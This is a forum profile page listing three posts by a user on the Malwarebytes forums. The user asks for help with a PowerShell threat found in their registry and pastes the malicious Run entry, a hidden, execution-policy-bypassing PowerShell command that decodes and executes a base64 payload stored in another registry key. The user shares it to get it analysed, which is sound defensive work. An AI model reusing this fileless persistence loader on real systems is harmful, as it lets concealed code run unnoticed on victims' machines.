Jump to content

Exouxas

Members
  • Posts

    3
  • Joined

  • Last visited

Everything posted by Exouxas

  1. Is there a way to make the script output $GWZNUIECUEHLSMGRMU into a text file instead of executing it? Maybe that would help to see what the script does?
  2. Here we go, got the registry folder for HKCU\Software\Classes\HCOVLIORJR I checked what programs got started when I run powershell with those arguments manually, and it starts SVCHost each time. Hope someone will be able to find out what this actually is/does. I think this might be residue from a virus that I got from a Thai colleague. It got transmitted through memory sick by putting all filles within a hidden folder and making an "infected" shortcut to the folder. But I'm not sure if it's from that time or if it's something else entirely. reg.zip
  3. Hey, new user on the malwarebytes forums here. Ok, so I scanned my computer with malwarebytes, and it detected "PUP.Optional.PowerShellSP" And that's ok, I mean it's just one threat right? But I started checking the actual registry key, and this MF is actually running powershell, which runs (binary?) code stored in my registry. Does anyone want to check what the code was doing? Here's the registry entry that malwarebytes detected: "{F119BFAB-D0C9-4E62-9DCF-7923777499B1}"="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\HCOVLIORJR').CEHMMUJMQRDF)));" I kinda wanted to post this in the "new malware" category, since the registry entry that it executes wasn't detected by malwarebytes, but it did detect the part where it runs.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.